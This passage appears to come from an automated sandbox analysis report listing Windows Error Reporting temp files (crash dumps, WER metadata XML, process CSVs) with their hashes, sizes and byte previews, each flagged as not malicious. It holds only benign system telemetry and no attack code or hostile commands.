                                                                                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D17.tmp.txt

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13340
                                                                                                                                                                                          Entropy (8bit):2.683239110738684
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:TiZYW5gddLaWQYcYiWaHVYEZ7dtBiuEVKS7cwABGkaPb5uYoMcNTVIE03:2ZD5hvbzhTaPb5udMcNTqE03
                                                                                                                                                                                          MD5:DBB59ADCCB193749358590C81A61A3C2
                                                                                                                                                                                          SHA1:0A3290284BE63A562219D8223AFFE7478E7CF0DD
                                                                                                                                                                                          SHA-256:E47E106C75DFD27FFDFA795C8A914B101763FE32F73E2439D1FD4C223980E68B
                                                                                                                                                                                          SHA-512:F4D3F4ED701853880854C2EA5F5CD9DE741EE3FF8487936DF69CAD6588526BD7DB91183D30E6623F4FBCB91EF95F6993F7F661B95B8D3A958EB61385500FA0A2
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4A1F.tmp.dmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Thu Mar 28 09:26:42 2024, 0x1205a4 type
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):550148
                                                                                                                                                                                          Entropy (8bit):3.5427165126968827
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:6144:yMXcnM3Y20rC+yE33Q1/6xd0CrcUXbrsnuRIf5TqT:HcMN+yEHQAXbr2TqT
                                                                                                                                                                                          MD5:26FCAEDD3086B495004CB1A1FDC8B11B
                                                                                                                                                                                          SHA1:F2D72F78569A177B5E685A80D9B4C541CC5C23EA
                                                                                                                                                                                          SHA-256:34288A2A21052242AB6CDD7EC317124F90CCC36B27C5E7A673DC56DD9C069F04
                                                                                                                                                                                          SHA-512:ABD5483F998F22FCA07E556F625D8A61C6EA3E7FC467A57A5768F738F300AABDF23C385DBE6C35F93F3892E5FE9919435CFD9D3D807A4375D2776B8AD9E1AC79
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:MDMP..a..... ........7.f............D...............d.......$...t!.......:...!......d}..6...........l.......8...........T............/...5...........[...........]..............................................................................eJ......4^......Lw......................T.......h....7.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4BE5.tmp.WERInternalMetadata.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9008
                                                                                                                                                                                          Entropy (8bit):3.7148368678006
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:R6l7wVeJIHpLn6YrT6HgmfaqDprG89btvEf0Zvm:R6lXJGpL6Yv6HgmfaqRtsf1
                                                                                                                                                                                          MD5:44EDA70ECFCA3418368AB4AEFD1BA96F
                                                                                                                                                                                          SHA1:009512D904F15A864A407C03B210E6C2D6806F9F
                                                                                                                                                                                          SHA-256:9AC10A82E460401018ABEF7D8227B8308025CDC322CDD48BF382357D7A038EF4
                                                                                                                                                                                          SHA-512:E617E4D506CA8FC86DFB72CCB539D8BD881B204EEF64AF2179939ADE45F40D3EBA75317505A9C884E9E182642DA666E944B0F706B8949FC4F5DB07306CD64D3B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.3.8.4.<./.P.i.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C34.tmp.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4734
                                                                                                                                                                                          Entropy (8bit):4.49425120972686
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs7Jg771I9mOSWpW8VYzYm8M4JNAFQIyq85ZUi2FJOlgd:uIjfVI7Zw7VfJKbi2F4lgd
                                                                                                                                                                                          MD5:A78E16BEFBD7E987E6938358B71A2660
                                                                                                                                                                                          SHA1:4D37BE7F0D31161343C1452609EAB350820ADDF4
                                                                                                                                                                                          SHA-256:6E308FE73BA79788D911E5C76B579C69BDF69D6B33DDBE538B08BF7C29A307F0
                                                                                                                                                                                          SHA-512:7CD2E969FB0932E61C0F1DB760AC5399F703FD2FF7E18A27E65EC7F1718E78FAACAEEF84BB7ADD797131AC77D8FDEA1298E8813BC6A71B76BCB4C5DCF4D843D6
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="254909" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C55.tmp.csv

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):78742
                                                                                                                                                                                          Entropy (8bit):3.023785605982372
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:ikPvsH0jvujZMl8LuUUXFJo3ai+z+8T+yT+Uva+G+Zy:ikPvsH0jvujZMl8LuUUXFJiai+z+8T+9
                                                                                                                                                                                          MD5:24020C0F50AB0E8B88669E54039044C1
                                                                                                                                                                                          SHA1:9D647C0DA3D3E7C632679862BEF06AF888F89DC5
                                                                                                                                                                                          SHA-256:A7267F4CB8B5ECDBA7C3E4FE51441FA4E2C42186F4F4665CA74504208C765838
                                                                                                                                                                                          SHA-512:5046A2C2F3E68ED5C2A9B4C9FB07C85A94E346F9D30A7EF0C5AE3B6E47F95D162877C2ED93BF5D3B7796893AF5301759C89009157CFD0C68F5165AC0BD4B0924
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C95.tmp.txt

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13340
                                                                                                                                                                                          Entropy (8bit):2.6845604162469114
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:TiZYWGzTfTOYcYvWjIHmYEZVNtHitMZbZGw2+J1WVabbEMPLOIH03:2ZD77fgtVabbEMPLZH03
                                                                                                                                                                                          MD5:191FEF4A87C90CB2BE5DE710BA1949CD
                                                                                                                                                                                          SHA1:450ABB59D2DAAFF33056E91A6DB6F1E9EF0A607B
                                                                                                                                                                                          SHA-256:396CB215B36A16B40F590AD084EA9B5171D9F221CDE0669103638D0923419722
                                                                                                                                                                                          SHA-512:C77E783574D07807AB676DE535799AAF08572A5AD7EBA1CC1590841746BBCF613FDBA4DF71833BEB5DE66DE58E09B799D4FA7A6893656D5438BE36F2D433DE7D
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER696F.tmp.dmp

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:Mini DuMP crash report, 16 streams, Thu Mar 28 09:26:51 2024, 0x1205a4 type
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):1997650
                                                                                                                                                                                          Entropy (8bit):2.5229756796403207
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:12288:xD+nv2Ji9zQktr0sPeXa0Q8eOvKZgyKNOqvNw:29zQktrua0HOqv
                                                                                                                                                                                          MD5:3F0D1C69FF9186B02A08A7FF3F4EF3F8
                                                                                                                                                                                          SHA1:7D5185EFBFBD7E68BBF6250D7F1153E08BA87A16
                                                                                                                                                                                          SHA-256:FA23AA733378CF84081BCB33A9DA682B023760428B8EAB6859489EF01E53C881
                                                                                                                                                                                          SHA-512:33EDE8D3FF14F14554818B7B8FCC0584A84A7F69B8FFD2E51FF0A0BD7A58CB9C51A08734F07BF1C28F2AB34476BE73F219223DB4992520A8533F6595808648EF
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:MDMP..a..... ........7.f............D............}..d.......$... .......4!..D.......$/..v,..........l.......8...........T...........hz..............x...........d...............................................................................eJ..............Lw......................T.......L....7.f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FA9.tmp.WERInternalMetadata.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):9010
                                                                                                                                                                                          Entropy (8bit):3.7153949198242104
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:192:R6l7wVeJYBQ6Yrg6bgmfWqDprRJ89bVpsf7nm:R6lXJeQ6Y86bgmfWqfmVyfS
                                                                                                                                                                                          MD5:7C48E900DD0A523002E4D78AD01B5125
                                                                                                                                                                                          SHA1:20FF346E51B3F3303847271AB36D61674DBBC1C9
                                                                                                                                                                                          SHA-256:8FAC68C3B53209166540C692DF20A03DB750829F83B419E1A73618165B3B73CD
                                                                                                                                                                                          SHA-512:04CE184291E54B3710FAD85DD2E2EB90D358A0E9A89D344857181A9976536E0CD3BBD671955FD06DF3A8E8AB61922036A51C39D1B42D0DA3445AE02F38CCE27B
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.6.6.0.<./.P.i.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FD9.tmp.xml

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):4736
                                                                                                                                                                                          Entropy (8bit):4.494010942793195
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:48:cvIwWl8zs7Jg771I9mOSWpW8VY8Ym8M4JNjIAFGyq85zjwd7svS2qS8nd:uIjfVI7Zw7VAJNWBd7sK298nd
                                                                                                                                                                                          MD5:51EC8F95F21962FB70BBB4951616EAD6
                                                                                                                                                                                          SHA1:A15B64C6D81F20B14B038092732114F4A18D49A4
                                                                                                                                                                                          SHA-256:462C64E9D580A9021A37293F5F325B1ED18B4119FD7454F786409DB278893830
                                                                                                                                                                                          SHA-512:C30BE77D0A038DDAE5F30883D89C69EE1E6DAA95D98F71B924DA84F636CDB5C2018E586AD124AA225EC18D421662DD069D6C6440998E630D8A53E0848A1F753C
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="254909" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER6FED.tmp.csv

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):80564
                                                                                                                                                                                          Entropy (8bit):3.0218655421924603
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:1536:CsJzq7l0INmjqvr8LMQZAVjYJBGai+z+8T+yT+Uva+G+Rp0p:CsJzq7l0INmjqvr8LMQZAVjYJwai+z+j
                                                                                                                                                                                          MD5:274E59170899A3C53C623E1257096742
                                                                                                                                                                                          SHA1:5B87DB7AA7B89E046720B7442565F9CFC319861A
                                                                                                                                                                                          SHA-256:35D8C59C021E07D603DED30B90554748A98DDEDD2DA8D77E50F3D3E49AD6CB1D
                                                                                                                                                                                          SHA-512:E92AB982D3269DF015DE98459E236B0B82FD82523306C501652F01A4F51A1FB321F1764D829B9ADD8C9B49E45C2CBCD494160BE7BB2C8334596E31B01F98BA35
                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                          Preview:I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

                                                                                                                                                                                          C:\ProgramData\Microsoft\Windows\WER\Temp\WER703C.tmp.txt

                                                                                                                                                                                          Download File
                                                                                                                                                                                          Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                          File Type:data
                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                          Size (bytes):13340
                                                                                                                                                                                          Entropy (8bit):2.6853094000871605
                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                          SSDEEP:96:TiZYWi7m9aYrYoWgHbYEZvGtHiGMnbo5wwfyRGMaBbzMrIfIU03:2ZD4MV6KGMaBbzMrIwU03
                                                                                                                                                                                          MD5:5E916AC5F867DA12BDE17AF47C9928BB
                                                                                                                                                                                          SHA1:AF2F67EFFC68976D96FF120597712029B527AA18
                                                                                                                                                                                          SHA-256:6ADF205478D8E38192686E04179BB3107170F02AC1A8B37B8F73E457EF457DDF
                                                                                                                                                                                          SHA-512:1B50DECB92E586606A105CF70F26A9077A52D0AF84857E2DEED94E57C7113A0646ABF02CF0D55698D110AC1C702ABC839B0A5F389805D89FE4F138A9A1C3EA0D
                                                                                                                                                                                          Malicious:false
